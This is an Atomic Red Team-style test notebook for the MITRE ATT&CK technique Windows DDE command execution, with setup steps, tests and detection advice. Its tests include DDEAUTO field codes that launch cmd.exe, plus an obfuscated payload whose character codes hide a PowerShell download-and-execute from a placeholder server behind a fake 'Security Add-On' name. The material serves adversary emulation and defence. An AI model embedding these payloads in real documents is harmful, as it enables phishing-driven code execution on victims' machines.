# T1559.002 - Inter-Process Communication: Dynamic Data Exchange
Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).

## Atomic Tests

In [ ]:
#Import the Module before running the tests.
# Checkout Jupyter Notebook at https://github.com/cyb3rbuff/TheAtomicPlaybook to run PS scripts.
Import-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force

### Atomic Test #1 - Execute Commands
Executes commands via DDE using Microsfot Word

**Supported Platforms:** windows
Run it with these steps!
Open Microsoft Word

Insert tab -> Quick Parts -> Field

Choose = (Formula) and click ok.

After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.

The Field Code should now be displayed, change it to Contain the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }


### Atomic Test #2 - Execute PowerShell script via Word DDE
When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
```

In [ ]:
Invoke-AtomicTest T1559.002 -TestNumbers 2

### Atomic Test #3 - DDEAUTO

TrustedSec - Unicorn - https://github.com/trustedsec/unicorn

SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Word VBA Macro

[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)

**Supported Platforms:** windows
Run it with these steps!
1. Open Word

2. Insert tab -> Quick Parts -> Field

3. Choose = (Formula) and click ok.

4. Once the field is inserted, you should now see "!Unexpected End of Formula"

5. Right-click the Field, choose "Toggle Field Codes"

6. Paste in the code from Unicorn or SensePost

7. Save the Word document.

9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"


## Detection
Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).

OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)